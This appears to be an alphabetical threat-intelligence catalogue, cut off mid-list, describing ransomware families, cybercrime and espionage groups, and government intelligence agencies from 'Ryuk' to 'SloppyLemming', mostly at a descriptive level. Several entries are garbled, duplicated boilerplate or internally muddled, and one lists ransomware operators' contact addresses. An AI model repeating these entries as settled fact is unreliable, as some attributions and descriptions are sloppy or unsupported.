Similar to Samas and BitPaymer, Ryuk is specifically used to target enterprise environments. Code comparison between versions of Ryuk and Hermes ransomware indicates that Ryuk was derived from the Hermes source code and has been under steady development since its release. Hermes is commodity ransomware that has been observed for sale on forums and used by multiple threat actors. However, Ryuk is only used by GRIM SPIDER and, unlike Hermes, Ryuk has only been used to target enterprise environments. Since Ryuk’s appearance in August, the threat actors operating it have netted over 705.80 BTC across 52 transactions for a total current value of $3,701,893.98 USD.
Ryuk
Ryuk is a ransomware operation known for targeting large organizations and demanding high ransom payments.
Służba Kontrwywiadu Wojskowego
Military Counter-intelligence Service - Służba Kontrwywiadu Wojskowego (SKW)
Służba Wywiadu Wojskowego (page does not exist)
Military Intelligence Service - Służba Wywiadu Wojskowego (SWW)
Saad Tycoon
Saad Tycoon is the operator and alleged developer of the Tycoon 2FA PhaaS, a phishing service that targets users for financial gain. The actor utilizes Bitcoin transactions to generate significant profits from the fraudulent service. The phishing infrastructure includes domain registration, server hosting, and possibly Cloudflare protection.
Sabbath
Sabbath is an active extortion or ransomware group tracked by RansomLook.
SABRE PANDA
SABRE PANDA is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
SAD
ransomware
SadComputer
ransomware
Sadogo
ransomware
SADStory
Ransomware Variant of CryPy
SafePay Ransomware Actors
The SafePay ransomware group is a cybercrime gang known for deploying ransomware to encrypt files and demand ransoms. They are relatively obscure and not widely discussed on illicit forums. Their activities include data exfiltration and file encryption, often using tools like WinRAR and FileZilla for archiving and potential exfiltration.[[huntress.com November 14 2024](/references/0418012c-af7e-47b0-b690-85fd634532e4)]
SafePay
SafePay is a ransomware group particularly active in Germany, responsible for 24% of the 74 ransomware victims reported in the country during Q1 2025.
Sage 2.0 Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. This ransomware attacks your MS Office by offering a Micro to help with your program, but instead incrypts all your files if the used id not protected. Predecessor CryLocker
Sage 2.2
Ransomware Sage 2.2 deletes volume snapshots through vssadmin.exe, disables startup repair, uses process wscript.exe to execute a VBScript, and coordinates the execution of scheduled tasks via schtasks.exe.
Sage Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc…
Salsa
ransomware
Salt Typhoon (Deprecated)
*We are no longer maintaining this object in favor of a similar object subsequently published by MITRE: "Salt Typhoon" (Group). All relevant Tidal content extensions (e.g. additional Technique and Object relationships and metadata) have been added to the MITRE-authored object.* Salt Typhoon is likely a cyberespionage group linked to the Chinese government. September 2024 reports indicated the group is believed to have compromised U.S. internet service providers with the intent of collecting sensitive information.[[WSJ Salt Typhoon September 26 2024](/references/15b4c5c3-edf2-4f6b-b398-62767cfabf5a)] Microsoft researchers indicate that "other names" for Salt Typhoon actors include FamousSparrow and GhostEmperor, a group that was previously tied to supply chain attacks on telecommunications and government entities in Southeast Asia.[[Microsoft Threat Actor Naming July 2023](/references/78a8137d-694e-533d-aed3-6bd48fc0cd4a)][[Sygnia July 17 2024](/references/7d30acb4-9600-46bd-a800-1c7e1149e9b4)] Mandiant researchers identified activity overlaps between GhostEmperor, FamousSparrow, and actors they track as UNC2286.[[Mandiant UNC4841 August 29 2023](/references/f990745d-06c1-4b0a-8394-66c7a3cf0818)]
SALTY SPIDER
Beginning in January 2018 and persisting through the first half of the year, CrowdStrike Intelligence observed SALTY SPIDER, developer and operator of the long-running Sality botnet, distribute malware designed to target cryptocurrency users.
Samas-Samsam
Ransomware Targeted attacks -Jexboss -PSExec -Hyena
SAMBASPIDER
SAMBASPIDER is a threat actor associated to the Mispadu malware. On July 24, USDoD allegedly scraped and leaked a 100,000-line Indicator of Compromise list from CrowdStrike, revealing detailed threat intelligence data. The leak, posted on Breach Forums, includes critical insights into the Mispadu malware and SAMBASPIDER threat actor.
SAMURAI PANDA
SAMURAI PANDA is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
Sanction
Ransomware Based on HiddenTear, but heavily modified keygen
Sanctions
Ransomware
SandCat
SandCat, on the other hand, is a group that was discovered more recently by Kaspersky. One of the Windows vulnerabilities patched by Microsoft in December had been exploited by both FruityArmor and SandCat in attacks targeting the Middle East and Africa. SandCat has been using FinFisher/FinSpy spyware and CHAINSHOT, a piece of malware analyzed earlier this year by Palo Alto Networks. The group has also used the CVE-2018-8589 and CVE-2018-8611 Windows vulnerabilities in its attacks, both of which had a zero-day status when Microsoft released fixes.
Sandman APT
First disclosed in 2023, the Sandman APT is likely associated with suspected China-based threat clusters known for using the KEYPLUG backdoor, specifically STORM-0866/Red Dev 40. Sandman is tracked as a distinct cluster, pending additional conclusive information. A notable characteristic is its use of the LuaDream backdoor. LuaDream is based on the Lua platform, a relatively rare occurrence in the cyberespionage domain, historically associated with APTs considered Western or Western-aligned.
Sands Casino
Sands Casino is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
Sandworm
This threat actor targets industrial control systems, using a tool called Black Energy, associated with electricity and power generation for espionage, denial of service, and data destruction purposes. Some believe that the threat actor is linked to the 2015 compromise of the Ukrainian electrical grid and a distributed denial of service prior to the Russian invasion of Georgia. Believed to be responsible for the 2008 DDoS attacks in Georgia and the 2015 Ukraine power grid outage
Santa Encryptor
ransomware
Saramat
ransomware
SARansom
ransomware
sarcoma
Sarcoma is a ransomware group that emerged in October 2024 and has been actively targeting various organizations. Sarcoma's attack methods include phishing campaigns, exploiting n-day vulnerabilities, and supply chain attacks. Once inside a network, they use RDP exploitation, lateral movement, and data exfiltration tactics. Sarcoma has claimed responsibility for attacks against Unimicron, a PCB manufacturer, Kelowna Springs Golf Club, Popular Life Insurance, CP Construplan, ADT Freight Services Australia, Micon National. These attacks have resulted in data exfiltration, with Sarcoma threatening to leak or having already leaked stolen data. Specifically, Sarcoma has exfiltrated 377 GB of SQL files and sensitive documents from Unimicron, 3.8 GB of data from Kelowna Springs, 36 GB of data from Popular Life Insurance, 2 GB of data from ADT Freight Services Australia, and 34 GB of data from Micon National. The group is known for its aggressive tactics against industrial organizations.
Sardoninir
Ransomware
Satan Cryptor 2.0
ransomware
Satan Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. Its original name is RAAS RANSOMWARE. It is spread using email spam, fake updates, infected attachments and so on. It encryps all your files, including: music, MS Office, Open Office, pictures etc.. This ransomware promotes other to download viruses and spread them as ransomware to infect other users and keep 70% of the ransom. (leaving the other 30% to Satan) https://3.bp.blogspot.com/-7fwX40eYL18/WH-tfpNjDgI/AAAAAAAADPk/KVP_ji8lR0gENCMYhb324mfzIFFpiaOwACLcB/s1600/site-raas.gif RaaS
Satan's Doom Crypter
ransomware
Satan666 Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..
Satana
Ransomware
Satancd
Satancd is an active extortion or ransomware group tracked by RansomLook.
SatanCryptor Go
ransomware
satanlock
Connected to GD Lockersec and Babuk-Bjorka.
Group is aka SalanLock (from typo on victim pages).
Sath-ı Müdafaa
A Turkish hacking group, Sath-ı Müdafaa, is encouraging individuals to join its DDoS-for-Points platform that features points and prizes for carrying out distributed denial-of-service (DDoS) attacks against a list of predetermined targets. Their DDoS tool also contains a backdoor to hack the hackers. So the overarching motivation and allegiance of the group is not entirely clear.
Saturn
ransomware
Satyr
ransomware
Saudi Arabian Border Guards
Saudi Arabia Border Guards Intelligence Directorate – استخبارات حرس الحدود
SaveTheQueen
ransomware
ScamClub
ScamClub is a threat actor involved in malvertising activities since 2018. They target the Mobile Web market segment, particularly on iOS devices, where security software is often lacking. ScamClub utilizes obfuscation techniques and real-time bidding integration with ad exchanges to push malicious JavaScript payloads, leading to forced redirects and various scams such as phishing and gift card scams.
ScammerLocker HT
ransomware
ScammerLocker Ph
ransomware
Scarab
Scarab APT was first spotted in 2015, but is believed to have been active since at least 2012, conducting surgical attacks against a small number of individuals across the world, including Russia and the United States. The backdoor deployed by Scarab in their campaigns is most commonly known as Scieron.
Scarlet Goldfinch
Scarlet Goldfinch is a threat activity cluster that typically tricks victims into downloading files that appear to be web browser updates, with the file ultimately leading to the deployment of NetSupport Manager, a remote monitoring and management (RMM) utility that has been heavily abused by adversaries.[[Red Canary June 26 2024](/references/e0d62504-6fec-4d95-9f4a-e0dda7e7b6d9)]
SCARLETEEL
SCARLETEEL is a threat actor that primarily targets cloud environments, specifically AWS and Kubernetes. They have been observed stealing proprietary data and intellectual property, as well as conducting cryptomining operations. SCARLETEEL employs sophisticated tactics and tools to bypass security measures and gain unauthorized access to accounts, often exploiting vulnerabilities in containerized workloads and misconfigurations in AWS policies.
Scarred Manticore
Scarred Manticore has been pursuing high-value targets for years, utilizing a variety of IIS-based backdoors to attack Windows servers. These include a variety of custom web shells, custom DLL backdoors, and driver-based implants.
Scatterbrain
ransomware
Scattered Canary
When the first member of Scattered Canary, who, for the purposes of this report, we call Alpha, began his operations, he was a lone wolf—working mostly Craigslist scams as he learned the tricks of the trade from a mentor. However, within a few years, he had honed his craft enough to expand into romance scams, where he met his first “employee,” Beta. Once they had secured enough mules via their romance scams to launder their stolen money, they shifted from targeting individuals to targeting enterprises, and the group’s BEC operation was born.
Scattered Lapsus Hunters
Scattered Lapsus Hunters is an active extortion or ransomware group tracked by RansomLook.
Schoolboys
Schoolboys is an active extortion or ransomware group tracked by RansomLook.
Schwerer
ransomware
ScorpionLocker
ransomware
Scrabber
ransomware
Scraper
Ransomware
ScreamedJungle
ScreamedJungle is a threat actor that exploits vulnerabilities in outdated Magento e-commerce platforms to inject malicious JavaScript code, specifically Bablosoft JS, into compromised websites. This actor has harvested millions of browser fingerprints by leveraging vulnerabilities such as CVE-2024-34102 and CVE-2024-20720. ScreamedJungle utilizes PerfectCanvas technology to ensure pixel-perfect replication of legitimate user fingerprints. Group-IB analysts estimate that over 115 e-commerce sites have been impacted by this fingerprint theft campaign.
Scripted Sparrow
Scripted Sparrow is a prolific Business Email Compromise (BEC) collective that conducts highly targeted phishing campaigns, impersonating professional services firms to deceive finance teams into transferring funds. The group employs a disciplined approach, utilizing consistent language and familiar tones in their communications, while sending between 10,000 and 50,000 emails daily in small batches. They have developed a sophisticated understanding of corporate communication, crafting messages that mimic internal formats and urgency without raising suspicion. Scripted Sparrow relies on a network of US-based mule accounts, with 249 unique bank accounts identified across 42 financial institutions for cash-out operations.
Scroboscope
ransomware
SCULLY SPIDER
Mentioned as operator of DanaBot in CrowdStrike's 2020 Report.
Seashell Blizzard Subgroup
This object reflects ATT&CK Technique and other relationships associated with an unnamed "subgroup" of the Russia-linked Seashell Blizzard group, known for a multiyear initial access operation dubbed the "BadPilot" campaign.[[Microsoft Security Blog February 12 2025](/references/300bf6cb-582b-4e15-8cca-cb68c8856e6f)] Seashell Blizzard is a high-impact threat actor linked to the Russian Federation, conducting global activities on behalf of Russian Military Intelligence Unit 74455 (GRU). Its operations range from espionage to information operations and cyber-enabled disruptions, including destructive attacks and manipulation of industrial control systems (ICS). According to Microsoft researchers, Seashell Blizzard "overlaps with" groups tracked as Sandworm Team, APT44, and other names.[[Microsoft Security Blog February 12 2025](/references/300bf6cb-582b-4e15-8cca-cb68c8856e6f)]
Second Investigation Department
Second Investigation Department - (Antrasis operatyvinių tarnybų departamentas (AOTD))
secp0
secp0 is an active extortion or ransomware group tracked by RansomLook.
Secret Intelligence Service
Secret Intelligence Service (SIS)/MI6[37] – Foreign intelligence gathering and analysis.
Secretaria da Receita Federal do Brasil
Secretaria da Receita Federal do Brasil (Federal Revenue Secretariat) (RFB) (General Coordination for Research and Investigations - Coordenação-Geral de Pesquisa e Investigação - Copei)
Secretariat of the Navy
Naval Intelligence - (Inteligencia Naval / SEMAR / Marina Armada)
SecretSystem
ransomware
SecureCryptor
ransomware
Security and Exchange Commission of Pakistan
Security and Exchange Commission Pakistan (SECP)
Security and Intelligence Agency
Sigurnosno-obavještajna agencija (SOA) (Security and Intelligence Agency)
Security and Intelligence Division
Security and Intelligence Division (SID)
Security Information Service
Security Information Service (Bezpečnostní informační služba, BIS)
Security Intelligence Agency
Security Intelligence Agency – Безбедносно-информативна агенција (BIA)
Security Service of Ukraine
Security Service of Ukraine – Sluzhba Bezpeky Ukrayiny (SBU)
Securotrop
Securotrop is an active extortion or ransomware group tracked by RansomLook.
SEDENA
Military Intelligence – National Defense Ministry (Inteligencia Militar – SEDENA / Ejercito y Fuerza Aerea)
Sefid Flood
Microsoft threat actor profile. Origin/Threat: Iran, Influence operations.
SeginChile
ransomware
Sekhmet
Ransom.Sekhmet not only encrypts a victims files, but also threatens to publish them.
SEND.ID.TO
ransomware
Sensayq
Sensayq is an active extortion or ransomware group tracked by RansomLook.
Seoirse Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Seoirse is how in Ireland people say the name George. Ransom is 0.5 Bitcoins.
Seon
ransomware
Sepsis
ransomware
SepSys
ransomware
SerbRansom 2017 Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The ransom is 500$ in bitcoins. The name of the hacker is R4z0rx0r Serbian Hacker.
Serpent 2017 Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..
Serpico
Ransomware DetoxCrypto Variant
Serviço de Informações de Segurança
Security Intelligence Service - Serviço de Informações de Segurança (SIS)
Serviço de Informações Estratégicas de Defesa
Defense Strategic Intelligence Service - Serviço de Informações Estratégicas de Defesa (SIED)
Service d'Intelligence National
Service d'Intelligence National (SIN) (National Intelligence Service)
Service de Renseignement de l’État
Luxembourg State Intelligence Service - (Service de Renseignement de l'État Luxembourgeois)
Servicio de Inteligencia de la Fuerza Aérea (Argentina)
Air Force Intelligence Service (SIFA) – Servicio de Inteligencia de la Fuerza Aérea
Servicio de Inteligencia del Ejército (Argentina)
Army Intelligence Service (SIE) – Servicio de Inteligencia del Ejército
Servicio de Inteligencia Naval (Argentina)
Naval Intelligence Service (SIN) – Servicio de Inteligencia Naval
Servicio Federal de Lucha contra el Narcotráfico
Federal Counternarcotics Service (SEFECONAR) – Servicio Federal de Lucha contra el Narcotráfico
Serviciul de Telecomunicații Speciale
Special Telecommunication Service (STS) – Serviciul de Telecomunicații Speciale
SEXi
SEXi is a ransomware group that targets VMware ESXi servers, encrypting data and demanding ransom payments. They have been observed encrypting virtual machines and backups, causing significant disruptions to services. The group's name is a play on the word "ESXi," indicating a deliberate focus on these systems. SEXi has been linked to other ransomware variants based on the Babuk source code.
SGL Actor
SGL is a username used by a threat actor on the XSS cybercriminal forum. The actor was observed attempting to sell access to allegedly compromised corporate network VPN gateways and RDP software.[[Resecurity Remote Access Compromise March 13 2024](/references/eb3fc217-44b7-496f-b5d1-68b40f476ce3)][[CYJAX 2024 Year in Review January 29 2025](/references/f22b8c2c-6307-420d-9aac-7da4f054bd1f)]
Shadi
ransomware
SHADOW-AETHER-015
SHADOW-AETHER-015 is a highly adaptable cybercriminal group known for identity abuse and cloud compromise, primarily targeting identity and access management systems like Okta and Azure AD/Entra ID. They employ sophisticated social engineering techniques, including vishing and help-desk impersonation, to gain access to legitimate credentials. Their operations involve multi-pressure extortion tactics, such as data theft, ransomware, and employee intimidation, while leveraging MFA fatigue and token theft to bypass authentication controls. The group has been linked to the "0ktapus" phishing campaign and is most active in English-speaking countries, with a focus on sectors rich in sensitive data.
Shadow-Earth-053
SHADOW-EARTH-053 is a China-aligned threat group exploiting unpatched Microsoft Exchange Server vulnerabilities, specifically CVE-2021-26855, to conduct cyberespionage against government and defense-linked targets across Asia and Europe. The group primarily deploys ShadowPad malware, utilizing techniques such as credential dumping, tunneling tools, and lateral movement via WMIC. They have also been observed installing web shells for persistence and leveraging a custom ExchangeExport tool to extract high-value mailbox contents. Additionally, low-confidence associations with Noodle RAT and CVE-2025-55182 have been noted in their operations.
Shadow Network
Shadows in the Cloud documents a complex ecosystem of cyber espionage that systematically compromised government, business, academic, and other computer network systems in India, the Offices of the Dalai Lama, the United Nations, and several other countries. The report also contains an analysis of data which were stolen from politically sensitive targets and recovered during the course of the investigation. These include documents from the Offices of the Dalai Lama and agencies of the Indian national security establishment. Data containing sensitive information on citizens of numerous third-party countries, as well as personal, financial, and business information, were also exfiltrated and recovered during the course of the investigation. The report analyzes the malware ecosystem employed by the Shadows’ attackers, which leveraged multiple redundant cloud computing systems, social networking platforms, and free web hosting services in order to maintain persistent control while operating core servers located in the People’s Republic of China (PRC). Although the identity and motivation of the attackers remain unknown, the report is able to determine the location (Chengdu, PRC) as well as some of the associations of the attackers through circumstantial evidence. The investigation is the product of an eight month, collaborative activity between the Information Warfare Monitor (Citizen Lab and SecDev) and the Shadowserver Foundation. The investigation employed a fusion methodology, combining technical interrogation techniques, data analysis, and field research, to track and uncover the Shadow cyber espionage network.
SHADOW-VOID-042
SHADOW-VOID-042 is a provisional intrusion set tracked by Trend Micro, active in October-November 2025, conducting spear-phishing campaigns against energy, defense, pharmaceutical, cybersecurity, and other sectors using lures like HR complaints, research surveys, and fake Trend Micro security updates urging browser fixes. Attacks employ multi-stage loaders: shellcode generates machine-specific IDs for C2 "get_module_hello" requests fetching encrypted Stage 2 (SystemProcessHost.exe) with scheduled tasks for persistence, followed by Stage 3 fetching additional payloads via API hashing and retries on hardcoded C2s. Infrastructure overlaps with Void Rabisu (ROMCOM/Storm-0978), but lacks confirmed ROMCOM deployment or Ukraine focus, warranting separate tracking.
Shadow
Shadow is an active extortion or ransomware group tracked by RansomLook.
shadowbyt3
shadowbyt3 is an active extortion or ransomware group tracked by RansomLook.
ShadowCryptor
ransomware
ShadowSyndicate
ShadowSyndicate is a threat actor associated with various ransomware groups, using a consistent Secure Shell fingerprint across multiple servers. They have been linked to ransomware families such as Quantum, Nokoyawa, and ALPHV. ShadowSyndicate's infrastructure overlaps with that of Cl0p, suggesting potential connections between the two groups. Their activities indicate they may be a Ransomware-as-a-Service affiliate.
ShadyPanda
ShadyPanda is a threat actor behind a 7-year campaign that has infected 4.3 million users through extensions masquerading as productivity tools while functioning as comprehensive spyware. Their tactics include data exfiltration, user surveillance, and systematic collection of corporate meeting intelligence from over 28 video conferencing platforms. Notably, the WeTab extension exemplifies their capabilities, collecting full browsing history and personal data, exfiltrating to 17 different domains. The actor employs steganography to hide malicious code within PNG files and maintains persistent access through shared infrastructure across their extensions.
ShaggyPanther
ShaggyPanther is a threat actor that primarily targets government entities in Taiwan and Malaysia. They have been active since 2008 and utilize hidden encrypted payloads in registry keys. Their activities have been detected in various locations, including Indonesia and Syria.
Shahid Hemmat
Shahid Hemmat is an IRGC-CEC affiliated hacking group linked to cyberattacks targeting U.S. critical infrastructure, including the defense industry and international transportation sectors. The group has been implicated in the hack of a booster station at the Municipal Water Authority in Aliquippa, Pennsylvania, which disrupted drinking water supply. Key figures within Shahid Hemmat include Manouchehr Akbari, Amir Hossein Hoseini, Mohammad Hossein Moradi, and Mohammad Reza Rafatnejad. The U.S. government is offering a $10 million reward for information on these individuals.
Shamoon Group
Shamoon Group is an Iran-linked threat actor associated with destructive Shamoon wiper operations targeting organizations in the Middle East, especially in the energy sector.
SHARK SPIDER
This group's activity was first observed in November 2013. It leverages a banking Trojan more commonly known as Shylock which aims to compromise online banking credentials and credentials related to Bitcoin wallets.
Shark
Ransomware
SharpPanda
SharpPanda, an APT group originating from China, has seen a rise in its cyber-attack operations starting from at least 2018. The APT group utilizes spear-phishing techniques to obtain initial access, employing a combination of outdated Microsoft Office document vulnerabilities, novel evasion techniques, and highly potent backdoor malware.
ShellLocker Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..
Shin Bet
Shin Bet (Internal Security Service)
ShinigamiLocker
ransomware
ShinoLocker
Ransomware
Shinra
SHINRA ransomware is a variant of the Proton ransomware family, known for its malicious activities involving data encryption and demanding a ransom for data decryption. After encrypting files, the ransomware renames them with a sequence of random characters and appends the ".SHINRA3" extension to the filenames. It is worth noting that this ransomware uses AES and ECC encryption algorithms to lock files on the victim's computer. Following the encryption, it creates a ransom note named "SHINRA-Recovery.txt." There are not many details about its operation or methods of infecting its victims, but after encryption, the victim needs to send an email regarding recovery to the addresses provided, including their ID as generated by the ransomware: Qq.decrypt@gmail.com Qq.encrypt@gmail.com ethan@fastmsg.info The ransomware also changes the victim's wallpaper, displaying the need to send the data and contact the threat actor.
ShinyHunters
ShinyHunters is a cybercriminal group of unknown origin that is motivated by financial gain. The group is known for its sophisticated attacks against a wide range of targets, including businesses, organizations, and government agencies. ShinyHunters typically uses phishing attacks and exploit kits to gain access to victim networks, where they deploy malware to steal sensitive data, such as names, addresses, phone numbers, Social Security numbers, and credit card information.
ShkolotaCrypt
ransomware
ShroudedSnooper
In September 2023, Cisco Talos identified a new malware family that it calls ‘HTTPSnoop’ being deployed against telecommunications providers in the Middle East. They also discovered a sister implant to 'HTTPSnoop,’ that they are naming ‘PipeSnoop,’ which can accept arbitrary shellcode from a named pipe and execute it on the infected endpoint. Based on these findings, the researchers assess with high confidence that both implants belong to a new intrusion set that it named ‘ShroudedSnooper.’
Shrug
ransomware
Shujin
Ransomware
ShurL0ckr
Security researchers uncovered a new ransomware named ShurL0ckr (detected by Trend Micro as RANSOM_GOSHIFR.B) that reportedly bypasses detection mechanisms of cloud platforms. Like Cerber and Satan, ShurL0ckr’s operators further monetize the ransomware by peddling it as a turnkey service to fellow cybercriminals, allowing them to earn additional income through a commission from each victim who pays the ransom.
Shutdown57
ransomware
ShutUpAndDance
ransomware
Sicari
Sicari is an active extortion or ransomware group tracked by RansomLook.
SiegedSec
SiegedSec, a hacktivist collective, emerged coincidentally just days before Russia’s invasion of Ukraine. Under the leadership of the hacktivist known as “YourAnonWolf,” the group swiftly gained strength, announcing an increasing number of victims after its inception. The group humorously self-identifies as “gay furry hackers” and is renowned for its comical slogans and the use of vulgar language. SiegedSec has affiliations with other hacker groups like GhostSec and typically consists of members aged between 18 and 26.
Siesta
FireEye recently looked deeper into the activity discussed in TrendMicro’s blog and dubbed the “Siesta” campaign. The tools, modus operandi, and infrastructure used in the campaign present two possibilities: either the Chinese cyber-espionage unit APT1 is perpetrating this activity, or another group is using the same tactics and tools as the legacy APT1. The Siesta campaign reinforces the fact that analysts and network defenders should remain on the lookout for known, public indicators and for shared attributes that allow security experts to detect multiple actors with one signature.
SifreCikis
ransomware
SifreCozucu
ransomware
Sifreli 2017
ransomware
Sifreli 2019
ransomware
Sigma Ransomware
Today one of our volunteers, Aura, told me about a new new malspam campaign pretending to be from Craigslist that is under way and distributing the Sigma Ransomware. These spam emails contain password protected Word or RTF documents that download the Sigma Ransomware executable from a remote site and install it on a recipients computer.
Signals Intelligence Agency
Signals Intelligence Agency (SIA)
Sigrun Ransomware
When Sigrun is executed it will first check "HKEY_CURRENT_USER\Keyboard Layout\Preload" to see if it is set to the Russian layout. If the computer is using a Russian layout, it will not encrypt the computer and just delete itself. Otherwise Sigrun will scan a computer for files to encrypt and skip any that match certain extensions, filenames, or are located in particular folders.
Silence group
a relatively new threat actor that’s been operating since mid-2016 Group-IB has exposed the attacks committed by Silence cybercriminal group. While the gang had previously targeted Russian banks, Group-IB experts also have discovered evidence of the group's activity in more than 25 countries worldwide. Group-IB has published its first detailed report on tactics and tools employed by Silence. Group-IB security analysts' hypothesis is that at least one of the gang members appears to be a former or current employee of a cyber security company. The confirmed damage from Silence activity is estimated at 800 000 USD. Silence is a group of Russian-speaking hackers, based on their commands language, the location of infrastructure they used, and the geography of their targets (Russia, Ukraine, Belarus, Azerbaijan, Poland, and Kazakhstan). Although phishing emails were also sent to bank employees in Central and Western Europe, Africa, and Asia). Furthermore, Silence used Russian words typed on an English keyboard layout for the commands of the employed backdoor. The hackers also used Russian-language web hosting services.
Silent Chollima
Andariel is a threat actor that primarily targets South Korean corporations and institutions. They are believed to collaborate with or operate as a subsidiary organization of the Lazarus threat group. WHOIS utilizes spear phishing attacks, watering hole attacks, and supply chain attacks for initial access. They have been known to exploit vulnerabilities and use malware such as Infostealer and TigerRAT.
Silent
Silent is an active ransomware-as-a-service operation tracked by RansomLook.
SilentRansomGroup
SilentRansomGroup is an active extortion or ransomware group tracked by RansomLook.
SilentSpring
ransomware
SilitNetwork
SilitNetwork is a hacking group known for targeting high-profile entities, such as airlines, for various motives. They utilize sophisticated tactics to breach their targets, potentially including social engineering and exploiting software vulnerabilities. The group's attack on RwandAir highlighted the vulnerability of the aviation industry and the need for robust cybersecurity measures.
SILKFIN AGENCY
SILKFIN AGENCY has claimed responsibility for multiple significant data breaches, including the compromise of DimeCuba.com, which exposed over 1 million SMS records and more than 100,000 email records. They also targeted the Sri Lankan Department of Agrarian Development, allegedly compromising the personal and agricultural data of over 1.45 million farmers. Additionally, they claimed a breach of the Siam Cement Group's database. The breaches involved sensitive data such as NIC numbers and transaction details.
SilkSpecter
SilkSpecter is a Chinese financially motivated threat actor that orchestrates phishing campaigns targeting e-commerce shoppers, particularly during peak shopping seasons. They exploit legitimate payment processors like Stripe to exfiltrate Cardholder Data and Personally Identifiable Information through convincing fake e-commerce sites created using the oemapps SaaS platform. Their phishing infrastructure relies on Chinese-hosted CDN servers and utilizes deceptive elements such as the "trusttollsvg" icon and a "/homeapi/collect" endpoint to track victim interactions. Analysts have linked SilkSpecter to over 89 IP addresses and more than 4,000 domain names associated with phishing activities, predominantly using .top, .shop, .store, and .vip TLDs.
SilverFish
SilverFish is believed to be a Russian cyberespionage group that has been involved in various cyberattacks, including the use of the SolarWinds breach as an attack vector. SilverFish has been linked to the Wasted Locker ransomware and has displayed a high level of skill and organization in their cyber operations. There are also connections between SilverFish and the threat actor Evil Corp, suggesting a possible evolution or collaboration between the two groups.
Silvertor
ransomware
Sima
Sima is a group of suspected Iranian origin targeting Iranians in diaspora. In February 2016, Iran-focused individuals received messages purporting to be from Human RightsWatch's (HRW) Emergencies Director, requesting that they read an article about Iran pressing Afghanr efugees to fight in Syria. While referencing a real report published by HRW, the links provided for the Director’s biography and article directed the recipient to malware hosted elsewhere. These spear-phishing attempts represent an evolution of Iranian actors based on their social engineering tactics and narrow targeting. Although the messages still had minor grammatical and stylistic errors that would be obvious to a native speaker, the actors demonstrated stronger English-language proficiency than past intrusion sets and a deeper investment in background research prior to the attempt. The actors appropriated a real identity that would be expected to professionally interact with the subject, then offered validation through links to their biography and social media, the former of which itself was malware as well. The bait documents contained a real article relevant to their interests and topic referenced, and the message attempted to address to how it aligned with their professional research or field of employment. The referenced documents sent were malware binaries posing as legitimate files using the common right-to-left filenames tactic in order to conceal the actual file extension. All of these techniques, while common pretexting mechanisms, are a refinement compared to a tendency amongst other groups to simply continually send different forms of generic malware or phishing, in the hopes that one would eventually be successful.
Simple_Encoder
Ransomware
SINGING SPIDER
SINGING SPIDER is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
SingularityMD
SingularityMD is a threat actor group that has targeted educational institutions in the US. They gained unauthorized access to their networks by exploiting weak security practices, such as using students' dates of birth as passwords. SingularityMD demanded a ransom in cryptocurrency and threatened to leak stolen information if not paid. They have demonstrated a willingness to follow through on their threats and have already leaked some data.
Sinobi
Sinobi is an active extortion or ransomware group tracked by RansomLook.
SintaLocker
ransomware
Sixteenth Air Force
Sixteenth Air Force (16 AF)
SkidLocker
Ransomware Based on EDA2
SkidSec
SkidSec is a threat group that has engaged in operations targeting exposed printers in South Korea to disseminate North Korean propaganda, utilizing techniques such as printer exploitation and social engineering for evidence collection. The group has also experienced a leadership change following the loss of their leader, Govadmin, while continuing to mobilize their followers for various missions. They have humorously solicited financial support for their activities, framing it as a means to support their cause. Additionally, they have been noted for their potential to leak sensitive information from compromised devices.
Skira Team
Skira Team is an active extortion or ransomware group tracked by RansomLook.
Skull HT
ransomware
Skull
ransomware
SkyName Ransomware
It’s directed to Czechoslovakianspeaking users. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Based on HiddenTear
SkyStars
ransomware
Slam
Slam is an active extortion or ransomware group tracked by RansomLook.
SlankCryptor
ransomware
SLIME29
SLIME29 is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
Slimhem Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is NOT spread using email spam, fake updates, attachments and so on. It simply places a decrypt file on your computer.
Slingshot
While analysing an incident which involved a suspected keylogger, we identified a malicious library able to interact with a virtual file system, which is usually the sign of an advanced APT actor. This turned out to be a malicious loader internally named ‘Slingshot’, part of a new, and highly sophisticated attack platform that rivals Project Sauron and Regin in complexity. While for most victims the infection vector for Slingshot remains unknown, we were able to find several cases where the attackers got access to MikroTik routers and placed a component downloaded by Winbox Loader, a management suite for MikroTik routers. In turn, this infected the administrator of the router. We believe this cluster of activity started in at least 2012 and was still active at the time of this analysis (February 2018).
SlopAds
SlopAds is a sophisticated ad fraud and click fraud operation involving a collection of 224 apps, downloaded over 38 million times globally. The threat actors utilize steganography, hidden WebViews, and a mobile marketing attribution platform to execute their fraud schemes, which include generating fraudulent ad impressions and clicks. Their infrastructure comprises multiple C2 servers and over 300 related domains, indicating plans for expansion. The operation has been linked to 2.3 billion bid requests per day, with significant traffic originating from the United States, India, and Brazil.
SloppyLemming
